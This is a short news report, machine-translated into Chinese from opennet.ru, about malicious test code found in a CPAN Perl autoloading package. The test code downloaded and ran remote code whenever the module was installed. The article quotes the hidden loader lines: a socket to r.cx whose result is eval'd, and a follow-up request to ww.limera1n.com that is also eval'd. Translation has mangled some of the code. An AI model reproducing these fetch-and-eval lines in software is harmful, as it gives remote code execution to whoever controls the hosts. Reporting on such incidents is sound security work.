在透過 CPAN 目錄分發的 Perl 包中 ,旨在動態自動載入 CPAN 模組, 惡意程式碼。惡意插入是 在測試代碼中 ,自 2011 年起開始出貨。
值得注意的是,關於載入有問題代碼的問題出現在 時間回到2016年。
惡意活動歸結為在安裝模組時啟動的測試套件執行期間嘗試從第三方伺服器 (http://r.cx:1/) 下載並執行程式碼。假設最初從外部伺服器下載的程式碼不是惡意的,但現在請求被重定向到 ww.limera1n.com 網域,該網域提供其部分程式碼供執行。
將下載組織到文件中 使用以下程式碼:
我的 $prog = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
我的 $try = `$^X $prog`;
指定的程式碼導致腳本被執行 ,其內容減少為以下行:
使用 lib do{eval&&botstrap("RCX")if$b=new IO::Socket::INET 82.46.99.88.":1"};
該腳本加載 使用該服務 來自外部主機 r.cx 的代碼(字元代碼 82.46.99.88 對應於文字“R.cX”)並在 eval 區塊中執行它。
$ perl -MIO::Socket -e’$b=新 IO::Socket::INET 82.46.99.88.”:1″;印出 ;'
eval 解壓縮 u=>q{_<‘)I;G1[)&(];F5W($E/.CI3;V-K970Z.DE….}
解壓縮後,最終執行如下: :
print{$b=new IO::Socket::INET"ww.limera1n.com:80″}"GET /iJailBreak
";評估回傳警告$@while$b;1
有問題的套件現已從儲存庫中刪除。 (Perl 作者上傳伺服器),並且模組作者的帳戶被封鎖。在這種情況下,模組仍然保留 位於 MetaCPAN 檔案中,可以使用某些實用程式(例如 cpanminus)直接從 MetaCPAN 安裝。 該軟體包並未廣泛分發。
討論起來很有趣 該模組的作者否認了他的網站“r.cx”被黑客入侵後被插入惡意代碼的信息,並解釋說他只是玩得開心,使用perlobfuscator.com不是為了隱藏某些東西,而是為了減小大小代碼並透過剪貼簿簡化其複製。選擇函數名稱「botstrap」是因為這個字「聽起來像 bot,而且比 bootstrap 短」。該模組的作者還保證,所識別的操作不會執行惡意操作,而只是演示透過 TCP 載入和執行程式碼。
來源: opennet.ru